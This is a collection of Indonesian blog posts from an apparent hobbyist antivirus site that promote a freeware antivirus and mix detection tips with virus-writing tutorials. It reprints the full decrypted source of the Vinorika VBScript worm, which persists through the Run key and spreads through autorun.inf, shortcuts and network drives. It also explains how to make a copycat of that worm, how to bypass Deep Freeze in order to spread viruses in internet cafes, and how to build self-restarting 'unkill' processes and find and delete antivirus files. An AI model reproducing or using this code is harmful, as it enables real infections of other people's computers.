Download Morphost Antivirus (Morphost Accords)

Morphost Antivirus versi 6 (Download here)

Akhirnya setelah berjuang dalam waktu yang lama. Melewati banyak perjuangan. Baik itu ujian masuk PTN, ospek, ataupun perjuangan lainnya, akhirnya Morphost ini pun selesai.

Jujur saja. Projek Morphost ini pun pernah vakum selama bulan 4 dan 5. Wah, wah.
Dan satu hal lagi…
Morphost yang baru ini pun gak luput dari kekurangan. Jadi maklum saja yah semuanya.
Semoga Morphost versi kali ini gak terlalu mengecewakan.

SILAKAN DOWNLOAD
Download Via Ziddu
Download Via 4shared

(Note: pastikan ada tulisan disudut kanan atas : “Dikompil ulang 1 sept 09″)

By:Morphic
Thanks to:
-MorphostLab Team (Nash, Satryacode, Yudha, Kholis, Axer, Neo Bekabe)
-Morphost RTP Tester (Haxeru)

Morphost Antivirus Versi 6 diluncurkan!

Morphost Versi 6 (Morphost Accords)

Morphost termasuk salah satu free local antivirus. Freeware ini sengaja dibuat untuk bekerjasama dengan antivirus-antivirus lokal lainnya untuk melindungi komputer-komputer di tanah air.

Tampilan Morphost sudah diubah (meskipun tidak 100%). Warna morphost masih hijau. Dan warna ini tidak akan pernah diubah.
Bahasa pengantar Morphost versi keenam juga sudah diubah menjadi bahasa Indonesia, supaya lebih bersahabat dengan penggunanya.

Pendeteksian dilakukan pada:
-virus Executable
-Virus Macro dan Virus Script
-Semua file yang terinfeksi
-semua file pemicu / pengeksekusi virus
-semua file pendukung / component virus

Pendeteksian dilakukan dengan:
-Perbandingan nilai checksum virus dengan checksum yang ada di database.
-Perbandingan string-string sensitif yang dimiliki virus dengan string yang tersimpan di dalam database
-Metode Heuristik
-Perbandingan checksum icon
-pemeriksaan string yang lebih mendalam
-Perbandingan atribut virus
-perbandingan tingkah laku virus.

Dan ini adalah gambar splashscreen Morphost yang baru.

Untuk registry tweaker, ada perubahan sedikit.
Sekarang registry tweakernya udah saya ubah jadi ”Bengkel Registry”

Yang itu untuk tampilan pertamanya.

Dan yang ini tampilan bengkel Registry yang kedua. Bisa langsung kalian coba di komputer/laptop kalian.

Kalau yang ini adalah tampilan bengkel registry yang ketiga.

Dan masih banyak lagi fitur-fitur lainnya di Morphost ini yang tidak bisa dijelaskan di artikel ini.

Bagi yang berminat bisa langsung download.
(Pastikan disudut kanan atas ada tulisan “Dikompil ulang 1 sept 09″

Download dari 4shared
Download dari Ziddu

By;Morphic
http://www.morphostlab.co.nr

Thanks to:
-Yudha, Rizki_ardian, Maxx , Neo, dan Nash (thanks karena udah mengupload virus di 4sharedku)
-semua mahasiswa FK USU.
-Mas Aat Shadewa
-Virologi
-Codenesia
-Yesaya, Inka, Kisscha, Jonathan, dan Luccian. (orang-orang aneh yang melengkapi hidupku. he he he)
-and others

Tiga langkah matikan deepfreeze

Yah, beberapa hari yang lalu, aku iseng-iseng lihat dasbor dan statistic blog MorphostLab-ku.
Ternyata banyak keyword mesin pencari tentang cara mematikan deepfreeze… Wah, wah, kesimpulannya sekarang ini banyak yang pengen matikan deepfreeze nampaknya…

He he he..
Ini ada cara lainnya…

Alasan kenapa anda ingin matikan deepfreeze adalah:
1. ingin nyebarin virus diwarnet (warnet-nya pake deepfreeze)
2. lupa password-nya jadi gak bisa nyimpan file di komp kesayangan kalian.

Itu dua alasan paling dominan…

Oke begini caranya…

Kamu harus tahu dulu kapan deepfreeze-nya terinstall…
Kalo gak tahu jga gak apaapa sih…

Langkah pertama.
Hidupkan komputermu lalu masuk ke BIOS cuy. Dan ubah waktunya menjadi sebelum waktu deepfreezenya terinstall. Kalo gak tahu kapan deepfreeze-nya terinstall silakan ubah aja waktunya menjadi 3 tahun yang lalu.

Langkah kedua.
Restart kompmu. Trus waktu masih booting tekan tombol F8 di keyboardmu. Nanti muncul suatu tampilan. Disitu ada muncul daftar pilihan booting. Pilih Start Windows in Debug Mode.

Langkah ketiga.
Udah itu tunggu sampe muncul gambar Welcome. Waktu masih muncul welcome langsung cepat-cepat hidupkan taskmanagermu (tekan Ctrl+alt+del). Ingat! Usahakan sebelum muncul wallpaper komp-mu. Usahakan selagi kompmu masih menampilkan welcome.
Lalu matikan process “DF5Serv.exe” dan ”Frzstate2k.exe”.

Udah beres cuy! Itu tadi 3 langkah matikan deepfreeze. Selebihnya kalian perbaiki sendiri komp kalian. Misalnya memperbaiki waktu di komputer kalian dan menguninstall deepfreeze kalian.
Tapi yang jelas deepfreeze udah non-aktif. Deepfreeze kalian udah Thawed.

Sekian tutorial ini.

By:Morphic
http://www.morphostlab.co.nr

Thanks to:
-Yudha
-Poet
-A.M.hirin

Tutorial Membuat Virus Vinorika Tiruan

Tutorial yang lalu, aku udah bahas tentang source code virus vinorika.
Sekarang kita akan bahas gimana caranya membuat vinorika tiruan….

Source Vinorika terbagi dua:
1. Source yang tak terenkrip
2. Source yang terenkrip

Sebelum melanjutkan tutorial ini aku harapkan kalian semua punya sampel vinorika dulu.

Coba buka sampel vinorika ”autorun.inf”

Kira-kira begitulah gambarannya..
Disitu ada tulisan ”Vinorika~!~2008” kan? Itulah yang menjadi pembatas kedua bagian sourcenya…

Nah, kita buat vinorika tiruannya! Sebetulnya sih bisa juga disebut virus hasil plagiat. Tapi tak apalah. Namanya juga untuk pembelajaran. Iya gak?

Sebelumnya akan aku ajari gimana caranya mendekrip source vinorika!
Buat dulu satu projek di VisualBasic.

Tampilannya begitu. Buatkan 2 textbox dan 1 command. Kedua textbox buat nilai multiline-nya ”True” dan scrollbars-nya vertical dan horizontal.
Source-nya begini aja.
Private Sub Command1_Click()
Dim i As Integer
For i = 1 To Len(Text1.Text)
t = Asc(Mid(Text1.Text, i, 1))
hsl = hsl + Chr(t Xor 5)
Next
Text2.Text = hsl
End Sub

Kenapa bisa dapat source itu?
Kemarin itu aku buka source-nya pake notepad++.
Lalu dapat source:
hsl=”"
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 5)
Next

Source itu lah yang dipake pembuat vinorika untuk mengenkrip dan mendekrip source-nya.

Sekarang coba jalankan dulu projek kita tadi!
Terus copy source virus vinorika yang terenkrip.
Perhatian: Copylah mulai dari tanda : “”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"”"” (tanda kutip banyak maksudnya!)
Gambarnya begini:

Yang didalam kotak merah itulah tanda yang kumaksud. Ada banyak sekali tanda kutip. Sesudah tanda kutip itu mulailah mengcopy sampai habis….

Udah itu paste aja di kotak pertama projek kita tadi lalu klik tombol-nya!!!
Hingga gambarnya jadi seperti berikut:

Di kotak kedua muncul tuh hasil dekrip source vinorika.

Sekarang aku ajak kalian semua untuk membuat vinorika tiruan! Sekarang buatlah source virus kalian seperti biasa. Tapi harus VBS loh….

Udah itu copas deh ke kotak teks pertama nanti hasilnya keluar di kotak teks kedua.
Hasil encrypt tadi kita copy dan replace ke source virus vinorika yang asli. Pastekan aja ke bagian sesudah tanda kutip banyak tadi.

Udah selesai. Kira-kira begitulah. Kalo gagal jangan salahkan aku ya…. aku juga belum nyoba nih tutorial. Ini Cuma pemikiranku doang. He he he he…

Supaya keliatan asli… ubah deh tulisan-tulisan di source vinorika bagian pertamanya (yang tidak terenkrip)…
Untuk melihat source utuh virus vinorika bisa dilihat di artikel blog http://www.morphostlab.co.nr

Sekian tutorialnya…

By:Morphic
thanks to
-senior-senior FK USU

Source Code Virus Vinorika

Semuanya udah pada tahu tentang vinorika. Apalagi kalo dikaitkan dengan nama “yuyun”, “harrypotter” dan lain-lain. Itu satu paket semuanya.

Vinorika ini cukup unik. Alasannya:
1.memanfaatkan file-file shortcut untuk pengeksekusian
2.agak lain dengan virus vbs lainnya.
3.induk-nya hampir tidak memanfaatkan file ”.vbs” (malah hanya menggunakan file ”.db” dan ”.inf” dan ”.lnk”
4. terenkrip!

Tapi sebetulnya gak seluruhnya terenkrip kok. Tubuh virus ini terbagi dua! Bagian pertama tidak terenkrip sedangkan bagian kedua terenkrip.

Bagian pertama isinya sebagai berikut:
‘============================
‘ Vinorika Go to Kediri….
‘ Capek dhe!!
‘ Kupersembahkan Sebagai permintaan maafQ bwt Vinurika Rahmania yg ada di Kediri….
‘ Hanya ini yang bisa Qlakukan…. tapi klo pean masih gk bisa maafin AQ ya mw gmana lgi.. he he!
‘
‘============================
On Error Resume Next
Dim fso, ws
Set fso = CreateObject(“scripting.filesystemobject”)
Set ws = CreateObject(“wscript.Shell”)
Set sh = CreateObject(“Shell.application”)
Set net = CreateObject(“wscript.network”)
Q=WScript.ScriptFullName
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+”\”+tn
Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
If status=”auto” Then
sh.Explore Left(WScript.ScriptFullName,3)
Else
status=Left(WScript.ScriptFullName,Len(WScript.ScriptFullName)-Len(WScript.ScriptName))+status
If fso.FolderExists(status) Then
sh.Explore status
Else
fso.CreateFolder status
sh.Explore status
End If
End If
Else
End If
Set QQ=fso.GetFile(Q)
Set Q1=QQ.OpenAsTextStream(1,0)
isiQ=Q1.Read(QQ.Size)
Q1.close
t1=InStr(1,isiQ,”Vinorika~!~2008″+” >>>”,0)+18
isiQ=Right(isiQ,Len(isiQ)-t1)
hsl=”"
For v=1 To Len(isiQ)
t=Asc(Mid(isiQ,v,1))
hsl=hsl+Chr(t Xor 5)
Next
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
Set temporary=fso.OpenTextFile(tmpt,2,True,0)
temporary.Write hsl
temporary.Close
ws.Run “WScript.exe //e:VBScript “+tmpt+” “”"+Q+”"”"

’————berakhir disini———
Kalo bagian pertama ini bisa aja dilihat kalo file ”thumbs.db” direname jadi ”.txt”. Dan semua orang bisa melakukan hal ini.

Oke. Oke. Ini semua belum berakhir teman…
Bagaimana dengan bagian kedua??? Bagian kedua terenkrip.
Ada satu baris yang membedakan dua bagian ini. Yaitu……
” ‘ Vinorika~!~2008”

Si virus maker sengaja memberikan tanda untuk membedakan kedua bagian supaya ketika virus dieksekusi si virus tahu mana source yang harus didekrip.

Nah, kebetulan source yang dienkrip itu sudah aku dekrip kemarin. Jadi aku tampilkan deh source-nya di blogku yang tercinta ini. He he he..
Source-nya bisa kalian manfaatkan dengan sebaik-baiknya.

Terus terang aja, setelah aku mendekrip semua source dibawah ini aku sanggup membuat vinorika tiruan. Dan aku yakin kalian semua pun bisa.

‘ Vinorika~!~
‘ send me an email to : Vinue_2007@yahoo.co.id
‘ Maafin Aq…Vinue
‘=======================================================
On Error Resume Next
Dim fso, ws, status,status1, fly
Set fso = CreateObject(“scripting.filesystemobject”)
Set ws = CreateObject(“wscript.Shell”)
Set sh = CreateObject(“Shell.application”)
Set net = CreateObject(“wscript.network”)
fly=false
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+”\”+tn
docx=ws.SpecialFolders(“MyDocuments”)

Set swt=WScript.Arguments
If swt.Count>0 Then
status=swt(0)
End If
if fso.fileexists(tmp+”\zvnita.ira”) then
set ira=fso.getfile(tmp+”\zvnita.ira”)
ira.attributes=0
ira.name=”shalihah.ira”
if ira.name=”shalihah.ira” then
ira.name=”zvnita.ira”
set ira=fso.opentextfile(tmp+”\zvnita.ira”,2,true)
else
fly=true
end if
else
set ira=fso.opentextfile(tmp+”\zvnita.ira”,2,true)
end if
Set AQ=fso.GetFile(status)
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
AQ.Copy tmpt,True
Set AQ=fso.GetFile(tmpt)
AQ.Attributes=39
anv=tmp+”\auto.exe”
If Not fso.FileExists(anv) Then AQ.Copy anv
Set auto=fso.GetFile(anv)
auto.attributes=0

Set aut=fso.OpenTextFile(tmp+an,2,True,0)
isi=”[autorun]>open=WScript.exe //e:VBScript thumb.db auto>shell\open=Open>shell\open\Command=WScript.exe //e:VBScript thumb.db auto>shell\open\Default=1>shell\explore=Explore>shell\explore\Command=WScript.exe //e:VBScript thumb.db auto”
isi=Replace(isi,”>”,vbCrLf)
aut.Write isi
aut.Close
auto.Attributes=39

ltkc=sh.Namespace(&H1c&).Self.path + “\Microsoft\CD Burning”
if fso.folderexists(ltkc) then
AQ.Copy ltkc+”\thumb.db”,True
auto.Copy ltkc+”\autorun.inf”,True
If fso.FileExists(docx+”\database.mdb”) Then fso.GetFile(docx+”\database.mdb”).Attributes=0
AQ.Copy docx+”\database.mdb”,True
end if
regQ
Set rara=UNISKA

Hertz False
If Day(Now)3 Then rekursif docx,1 Else rekursif docx,3

call attack_net
Hertz True

Sub rekursif(path,dp)
On Error Resume Next
dropf path
wscript.sleep 50
If dp>0 Then
For Each fldr1 In fso.GetFolder(path+”\”).SubFolders
rekursif fldr1.Path, dp-1
Next
End If
End Sub

Sub dropf(path)
On Error Resume Next
if day(now)=17 and month(now)=1 then
rara.copy path+”\Maafin AQ Vinurika Rahmania^_^!.rtf”
for pp=1 to 100
rara.copy path+”\Maafin A_Q Vivi..” & pp & “.xls”
rara.copy path+”\MaafinQ y Uplix..” & pp & “.htm”
rara.copy path+”\Maafin Aku Vee..” & pp & “.jpg”
rara.copy path+”\Sorry Vinue..” & pp & “.mp3″
wscript.sleep 500
next
rara.copy path+”\Vinorika.rtf”
end if

g1=path+”\autorun.inf”
g2=path+”\Thumb.db”
If fso.FileExists(g1) Then
Set g11=fso.GetFile(g1)
If g11.Attributes39 Then
g11.Attributes=0
auto.Copy path+”\autorun.inf”,True
end if
else
auto.Copy path+”\autorun.inf”,True
end if

If fso.FileExists(g2) Then
Set g12=fso.GetFile(g2)
If g12.Attributes39 Then
g12.Attributes=0
AQ.Copy path+”\Thumb.db”,True
end if
else
AQ.Copy path+”\Thumb.db”,True
End If

If Not fso.FileExists(path+”\Microsoft.lnk”) Then
shorZvnita path+”\Microsoft”,”Microsoft”
drop=Array(“New Harry Potter and…”,”New Folder”,”SuratQ”,”Zanya Zulkarnaen”,”Game”,”Zvnita ir4″,”Download”,”DataQ”,”Kediri”)
ww=1
For Each d In drop
If Day(now) Mod 3 = ww Then shorZvnita path+”\”+d,d
wscript.sleep 60
ww=ww+1
Next
r=0
For Each fldr In fso.GetFolder(path+”\”).SubFolders
shorZvnita path+”\”+”Shortcut to “+fldr.name+”.lnk”,fldr.Name
wscript.sleep 60
If r>3 Then
Exit For
End if
r=r+1
Next
End If
End Sub

Sub shorZvnita(path,trgt)
Set shor=ws.CreateShortcut(path+”.lnk”)
shor.iconlocation=”shell32.dll,3″
shor.targetpath=”wscript.exe”
shor.arguments=”//e:VBScript thumb.db “”"+trgt+”"”"
shor.save
End Sub

function attack_net()
On Error Resume Next
err.clear
Set objFolder = sh.Namespace(&H13&)
Set colItems = objFolder.Items
For Each strFileName in objFolder.Items
t= objFolder.GetDetailsOf(strFileName, 14)
if err.number>0 then
exit function
end if
rekursif t,4
Next
End function

Sub tdr()
On Error Resume Next
err.clear
WScript.Sleep 180000
if err.number>0 then wscript.quit
End Sub

function UNISKA()
On error resume next
x=vbcrlf
adv=”Aztig Present^_^!>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>”"Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman.”">(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: “”Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat.”" (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: “”Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya….”" (QS. An Nur:30)>>sampaikan salam maafQ bwt: Vinurika Rahmania..[@_@]>The Repvblik maker Return in Kediri 2008>vinue_2007@yahoo.co.id”
adv=replace(adv,”>”,x)
set vivi=fso.opentextfile(tmp+”\v.doc”,2,true)
vivi.write adv
vivi.close
set UNISKA=fso.getfile(tmp+”\v.doc”)
end function

Sub regQ()
On Error Resume Next
if day(now)=1 then
ws.RegWrite “HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\”, “Betapa indahnya kalian, andai berjilbab spertiQ…(Vinorika)^_^!”
ws.RegWrite “HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\”,”shell32.dll,48″
ws.RegWrite “HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes”,0,”REG_DWORD”
ws.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\”,”"
end if
ws.RegWrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Explorer”,”Wscript.exe //e:VBScript “+docx+”\database.mdb”
End Sub

Sub Hertz(ooo)
On Error Resume Next
do
For Each drv In fso.Drives
If drv.DriveType=1 Then
rekursif drv.Path,4
Else
rekursif drv.Path,2
End if
Next
if fly=false then
tdr
else
wscript.quit
end if
regQ
If ooo=False Then
Exit Do
End If
loop
End Sub

’———– berakhir disini————-

Kalau kalian Cuma merename file induk virus mungkin source diatas gak mungkin bisa kalian temukan.

Dulu, Morphost udah bisa memberantas file-file shortcut buatan vinorika. Tapi ada kelemahannya! Yaitu FalseAlarm!

Sekarang Morphost yang baru (Morphost Accords) udah bisa mendeteksinya dengan baik tanpa false Alarm sedikitpun! Kalian juga bisa.
Hanya butuh satu string saja kok!

Tapi yang jadi masalah gimana menemukan string yang cocok?
File ”LNK” (file shortcut) gak bisa direname jadi ”txt”. Terus kalo file shortcut-nya dibuka pake Notepad++ yang muncul malah isi file “wscript.exe”

Jadi yang mana yang benar?
Kemarin aku pake cara ini:
Gantikan fileshortcut dibawah menjadi alamat file shortcut virus vinorika.

Open fileshortcut For Binary As #1
filedata = Space$(LOF(1))
Get #1, , filedata
Close #1
Open ”D:\sampel.txt” for binary as #1
Put #1,, filedata
Close #1

Lalu setelah dijalankan, coba lihat file “D:\sampel.txt”. nah itulah isi perut sesungguhnya dari file shortcut Vinorika.
Lalu untuk penerapannya pada antivirus? Silakan ambil string yang paling kamu curigai.
Kalau aku sendiri pake string:
777363726970742E657865 (dalam bentuk hexadecimal. Silakan ubah sendiri ke bentuk ASCII)
Dan aku sendiri yakin string yang satu ini cukup ampuh dijadikan signature.

Untuk menangani virus ini pada komputer korban silakan gunakan antivirus Morphost (Morphost Accords.(Versi terbaru))

Jujur aja, banyak teman-temanku yang kena virus ini. Dan mereka semua benci dengan PembuatVirus Vinorika.
Kepada PembuatVirus Vinorika: ”Sebagai rasa balas dendam, mewakili seluruh teman-temanku, aku ucapkan ”F*ck you!”

Sekian dulu….

By:Morphic
Thanks to:
-seluruh anak-anak FK USU stambuk 09

Checksum Icon Virus

Ternyata gak Cuma file punya checksum, icon juga punya…
Ya ini lah teknik yang dipake para AVmaker yang menggunakan heuristic icon compare pada antivirus mereka. Mereka menyimpan checksum-checksum icon virus supaya bisa mendeteksi virus-virus baru…

Sebelumnya, aku salut sama mas hirin yang udah bikin artikel tentang heuristik icon secara jelas(baca di virologi). Aku rasa artikelnyalah yang membahas heuristik icon paling jelas dari semua artikel… (ini menurutku loh)

Cara kerjanya cukup simple…
Kita membuat satu control picturebox pada form kita lalu meload icon setiap file yang akan discan. Lalu picturebox tadi akan menyimpan icon tadi ke suatu file lalu antivirus kita memeriksa / menghitung checksumnya…

Oke. Artikel kali ini gak membahas bagaimana membuat heuristik icon. Karena kalian bisa baca sendiri artikelnya mas A.M.Hirin.

Kali ini aku Cuma mau berbagi-bagi checksum virus yang make teknik A.M.Hirin. Bagi siapa saja yang menerapkan trik A.M.hirin pda antivirusnya, ini aku kasih beberapa checksumnya…

Checksum ini Cuma untuk picturebox yang ukuran width&height-nya 255 x 255. Ingat beda ukuran pasti beda dong checksumnya…
14F53AF= “New Virus [A]“
1258BDF = “New Virus [B]“
14F8EB5 = “New Virus [C]“
1F747A7 = “New Virus [D]“
12E1789 = “New Virus [E]“
17165A8 = “New Virus [F]“
168CF61 = “New Virus [G]“
10CBC97 = “New Virus [H]“
14FDCF5 = “New Virus [I]“
131D25F = “New Virus [J]“
167F336 = “New Virus [K]“
1515CF2 = “New Virus [L]“
1195897 = “New Virus [M]“
16E8893 = “New Virus [N]“
15E500E = “New Virus [O]“
1786696 = “New Virus [P]“
139C256 = “New Virus [Q]“
16B6EBD = “New Virus [R]“
1445FCA = “New Virus [S]“
15024D7 = “New Virus [T]“
:
Kita sebut saja ”NewVirus[]” oke.
Sebenarnya mash banyak lagi, tapi Cuma inilah checksumnya paling sering mendetek virus!

Sekian tutorial dari MorphostLab

Thanks to:
-A.M.Hirin
-Satryacode
-Aat Shadewa
-Virspector
-Runion

Pencarian File Tercepat!

File anda hilang? Ooo, ada dua artinya menghilang.

Arti yang pertama, filemu memang hilang… mungkin terdelete ato mungkin filemu di dalam flashdisk lalu flashdiskmu hilang?

Arti yang kedua, filemu sebenarnya masih ada tapi kamu-nya yang lupa apa namanya…

Okey,okey… manusia memang harus maklumi sifat pelupanya.. he he he

Arti yang ketiga (eh sori, ada tiga rupanya), file-mu ada di dalam pelosok-pelosok folder…. Dan kamu lupa nyimpan di folder yang mana?

Okey. Okey. Banyak keluhan smacam itu.

Tapi untuk kali ini, kita akan membahas masalah arti yang ketiga. Yang artinya kamu lupa nyimpan filemu dimana. Untuk pengertian pertama dan kedua kita lewatkan saja.

Untuk masalah yang ini….

Ada solusinya!

1. Cari filenya di dalam folder satu persatu

Keuntungan: file kita bisa kita temukan.

Kekurangan: mau cari sampe kapan? Bisa bertahun-tahun…

2. Cari pake fitur Search! (misalnya fitur search di windows)

Keuntungan: file kita bisa kita temukan.

Kekurangan: emang sih… lebih cepat dari cara pertama. Tapi kalo file di komp-mu banyak? Bisa berbulan-bulan…. he he he

3. Cari pake trik yang saya jelaskan nanti…

Keuntungan: file kita bisa kita temukan dengan cepat (gak sampe satu menit)

Kekurangan: kalo menurutku gak ada.

Lalu apa trik-nya?

Begini,

Saya akan berikan code-nya yang bisa kalian ketik di visual basic. Sebenarnya ini Cuma trik lama tapi saya yakin masih ada 7 dari 10 programmer VB indo masih belum tahu….

Ini source codenya….

Private Declare Function SearchTreeForFile Lib “imagehlp” _

(ByVal RootPath As String, ByVal InputPathName As String, _

ByVal OutputPathBuffer As String) As Long

Private Const MAX_PATH = 260

Private Sub Form_Load()

Dim tmpStr As String, Ret As Long

tmpStr = String(MAX_PATH, 0)

Ret = SearchTreeForFile(“c:”, “contoh.exe”, tmpStr)

If Ret <> 0 Then

MsgBox “Lokasi file di ” + Left$(tmpStr, _

InStr(1, tmpStr, Chr$(0)) – 1)

Else

MsgBox “File tidak ditemukan!”

End If

End Sub

Coba perhatikan code:

Ret = SearchTreeForFile(“c:”, “contoh.exe”, tmpStr)

Disitu ada diketik ”c:”, itu maksudnya pencarian dilakukan di drive ”C”. Yang itu bisa kalian gantikan dengan drive apa saja.

Lalu disitu juga diketik ”contoh.exe”, itu maksudnya file yang kalian cari! Harus jelas loh filename-nya… Bisa kalian gantikan dengan nama file apa saja….

Code diatas juga bisa kalian modif dengan ditambahkan satu tombol dan satu teksbox.

Dimana tombolnya gunanya untuk melakukan pencarian sedangkan teksbox bisa dijadikan tempat nama file yang kalian ingin cari.

Code ini juga bisa diimplementasikan untuk virus dan antivirus kalian. Dan saya juga bakal menerapkannya pada Morphost versi enam nanti…

Untuk virus gunanya untuk mencari file-file target (biasanya untuk mencari file-file antivirus)

contoh: si virus mencari antivirus yang namanya HebatAV. Lalu si virus mencari file “HebatAV.exe” begitu ketemu langsung main hapus!!!

Sekian tutorial dari MorphostLab

By:Morphic

Karta_morphic@yahoo.co.id

Thanks to:

-Serviks

-Yudha

-Akhi

-dan lain-lain

Teknik unkill virus Babon

Pernah dengar virus babon? Ooo pasti pernah dong. Dulu teknik yang dipake ama virus ini cukup ngetren dimasa-nya… Sampe-sampe banyak Avmaker juga bingung tuh ama virus ini. Apa yang aneh?

Si Babon ternyata make teknik unkill. Yang artinya ”tidak dapat dibunuh”. Tapi bukan berarti gak bisa mati! Ada cranya juga membunuhnya…

Secara logika begini trik-nya…
-buat lebih dari satu induk virusmu
-perintahkan mereka untuk saling memanggil….

Cukup dua baris itu aja. Ha ha ha. Sepertinya banyak yang udah tahu trik ini tapi gak apa-apa deh buat yang newbie.

Begini. Andaikan kamu membuat virus… Pastinya virus kamu membuat induk di komputer korban…
Perhatikan aku mnulis source code virus sederhana berikut.

Private sub form_load()
App.taskvisible=false
me.visible=false
Call SpreadFile
End sub

Sub SpreadFile()
On error resume next
Dim Location(3) as string
Dim jml as integer
Location(1) = Environ$(“windir”) & “\system32\Top.exe”
Location(2) = Environ$(“windir”) & “\system32\Top2.exe”
Location(3) = Environ$(“windir”) & “\system32\Top3.exe”
For jml = 1 to 3
Filecopy app.path & “\” & app.exename & “.exe” , location(jml)
Next
End Sub

Itu sederhananya.. itu source untuk menyebarkan induk-nya… Lalu?
Supaya kita bisa make teknik unkill tambahkan satu timer yang intervalnya kurang dari 500. (ingat: satu detik sama dengan 1000 interval timer!)

Private sub Timer1_timer()
Shell Environ$(“windir”) & “\system32\Top.exe”
Shell Environ$(“windir”) & “\system32\Top2.exe”
Shell Environ$(“windir”) & “\system32\Top3.exe”
End sub

Lalu jangan lupa tambahkan sedikit code di Form_Load().
Pokoknya terakhir code-nya seprti ini:
Private sub form_load()
If app.Previstance then End
App.taskvisible=false
me.visible=false
Call SpreadFile
End sub

Kalo Babon lain lagi…
Coba buat satu module dan ketik code-nya berikut:

Declare Function FindWindow Lib “user32″ Alias “FindWindowA” (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Declare Function GetWindow Lib “user32″ (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Declare Function OpenIcon Lib “user32″ (ByVal hwnd As Long) As Long
Declare Function SetForegroundWindow Lib “user32″ (ByVal hwnd As Long) As Long

Public Const GW_HWNDPREV = 3

Private Sub ShowPrevInstance()
Dim OldTitle As String
Dim ll_WindowHandle As Long
OldTitle = App.Title
App.Title = “abcde – Aplikasi ini akan ditutup!”
ll_WindowHandle = FindWindow(“ThunderRT6Main”, OldTitle)
If ll_WindowHandle = 0 Then Exit Sub
ll_WindowHandle = GetWindow(ll_WindowHandle, GW_HWNDPREV)
Call OpenIcon(ll_WindowHandle)
Call SetForegroundWindow(ll_WindowHandle)
End
End Sub

Sub Main()
If App.PrevInstance Then Showprevinstance

Load Form1
Form1.Show

End sub

Jangan lupa mengubah startup virusmu menjadi “sub main”. Okey!

Sekian tutorial dari saya…
Thanks

By:Morphic
Karta_morphic@yahoo.co.id
Thanks to:
http://www.morphostlab.co.nr
MorphostLab Team
Anak-anak FK USU stambuk 09

Penerapan Menu Konteks ‘Send To’ pada virus dan AV

Ini adalah tutorial untuk para newbie… Namanya juga blog Morphostlab. Semuanya disitu untuk para newbie. He he he ….

Pernah mengklik kanan file lalu pilih “send to”???
Seperti gambar dibawah ini….

Sebetulnya caranya gampang untuk nambahin shortcut di bagian send to…

Sekarang buka “C:\Documents and Settings\Administrator\SendTo” (kalo dikomp-ku alamatnya seprti itu loh)
Gambarnya kayak dibawah ini….

Di situ klik kanan lalu pilih “new folder” lalu buat namanya “File Data”

Setelah kamu membuat folder itu, sekarang cobalah untuk mengklik kanan sebuah file. Apa yang terjadi?

Kliatan jelas kan? Sekarang belum selesai nih…

Coba copy sebuah folder apa saja yang ada di komputermu…. Misalnya folder “Tugas Sekolah”
Setelah di copy buka lagi alamat “Send to” tadi dan klik kanan lalu “Paste ShortCut”

Sekarang liat, apa yang terjadi….

Nah sekarang penerapan pada virus dan antivirusnya..

Untuk Virus:
Kalau virusnya bericon folder cukup ampuh untuk pake teknik ini, ato bisa juga dengan icon ”My Document” ato ”Winzip”.
Pertama harus tahu dulu gimana bikin shortcut. (kalo belum tahu baca artikel: Membuat Shortcut:Alternatif menuju virus dan antivirus. Baca artikelnya di blog MorphostLab).
Udah itu, ya gampang sudah….
Replace aja file-file shortcut yang ada folder ”Send to”

Untuk Antivirus:
Aku jamin 100% belum ada antivirus yang pake teknik ini. Mungkin Morphost lah antivirus yang pertama pake teknik ini (Morphost Versi enam: Morphost Accords). Emang sih, gak ada pengaruhnya dengan bagus tidaknya suatu antivirus.
Trik begini.
Jadi misalnya kalian mendapat sebuah virus… tinggal klik kanan lalu pilih ”Karantinakan Virus ini!”

1. pertama buat dulu shortcut-nya (membuat shortcut pake Visualbasic baca artikel yang udah kutulis ya)
2. di dalam shortcut itu buat link-nya ke file induk.
Misalnya file induknya “D:\antivirus.exe”
Buat link-nya ”D:\antivirus.exe /K” atau ”D:\antivirus.exe /M” atau ”D:\antivirus.exe ”/S”
Buat link-nya apa saja asal jangan lupa huruf parameter. Untuk huruf paramaternya terserah mau huruf apa saja boleh asal jangan huruf jepang. He he.
3. Lalu ketik source code pada software antivirus kalian
Ketik source code ini pada sebuah module

Sub Main()
Select case UCase$(Left$(Command, 2))
Case “/M” ‘————- ketik disitu huruf parameter kalian! Contoh pada source code ini adlah “/M”
Filecopy Mid$(Command, 4, Len(Command) – 3), App.Path & “\Karantina\virus.vir”
Kill Mid$(Command, 4, Len(Command) – 3)
End select
‘bla bla bla
End sub

